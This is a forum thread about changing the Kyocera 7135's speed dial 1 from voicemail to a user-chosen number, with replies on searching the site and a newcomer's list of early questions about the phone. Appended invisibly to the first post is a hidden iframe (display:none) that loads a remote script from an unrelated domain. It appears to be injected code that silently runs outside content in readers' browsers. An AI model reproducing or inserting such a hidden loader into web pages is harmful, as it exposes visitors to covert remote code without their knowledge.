+ Reply to Thread

what if I don't WANT speed dial 1 to go to VM?

I don't use voicemail, and would prefer to have speed dial 1 to use for my own. Is there now way I can tell the 7135 to let me reprogram speed dial 1?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: what if I don't WANT speed dial 1 to go to VM?

Originally posted by zolot
    I don't use voicemail, and would prefer to have speed dial 1 to use for my own. Is there now way I can tell the 7135 to let me reprogram speed dial 1?
    Go to the messages icon...then

Click on MESSAGES>>SETTINGS>>VOICEMAIL>>and change the # to what ever you want.

A search of the site would have found this...

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

thanks, Jeff. That's great!

I did search the site, for "voicemail speed dial", for "speed dial one", and some other things. nothing interesting came up. And I've read the FAQs. I am new to the site, and anticipate having other questions. Any suggestions as to how to effective search (and weed through the sometimes large volume of hits).

Originally posted by zolot
    thanks, Jeff. That's great!

I did search the site, for "voicemail speed dial", for "speed dial one", and some other things. nothing interesting came up. And I've read the FAQs. I am new to the site, and anticipate having other questions. Any suggestions as to how to effective search (and weed through the sometimes large volume of hits).
    I was just saving alanb the trouble of saying use search!

Well... search by thread (rather than posts) and in the 7135 discussions only.

You SHOULD find a topic to your liking at that point.

I did a search on CHANGE SPEED DIAL and found these:

http://www.smartphonesource.com/vbul...der=descending

8 threads down I found this:

http://www.smartphonesource.com/vbul...nge+speed+dial

2 posts in was the answer...

Hope it helps...

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Jeff, thanks a lot. I've been floating around here for quite a while and never knew the number could be changed. That removed one irritation and allows me to set the phone to conform to the speed dial list in all my other devices.

zolot,
    Welcome to the family! Glad you like your 7135 and that you got the issue solved.
    ~'kito
    pdaPhoneHome Moderator

experience of being new to a 7135

Markito, Thank you much for your warm welcome. This is a great forum, and it has been tremendously helpful. I'm only about 12 hours into my 7135, but so far so good. I've been through many of the same questions that I see others having puzzled over. Here are highlights of my first issues (which I've largely already found answers to):

1. sorting out Verizon's array of offerings for IP connectivity ("mobile web" vs "express network" vs not paying any extra fees and using "qnc" -- which is what I'm doing for the moment).

2. deciding to buy an SD card and contemplating how I'll use it (and using a Macintosh OS X, thereby not having the benefit of Kyocera's PC-only utilities for managing MP3s, images, etc).

3. puzzling over what the OpenWave browser is, why it wants to do a security check and fails, then deciding I don't need it at all. Evaluating Eudora web.

4. Finding the nice selection of cables from coolcat and thinking about audio output options and FM modulators.

Next up:
    - trying to find good palm-friendly web sites, migrating off of my "palm.net" web-clipping apps (just gave up a Palm Vii).

- figuring out why certain applications can't be deleted, why others can't be assigned to "button" actions.

- better understanding where/how things are stored on the 7135, and how i'll organize files on the SD card.

lots of other things, I would imagine!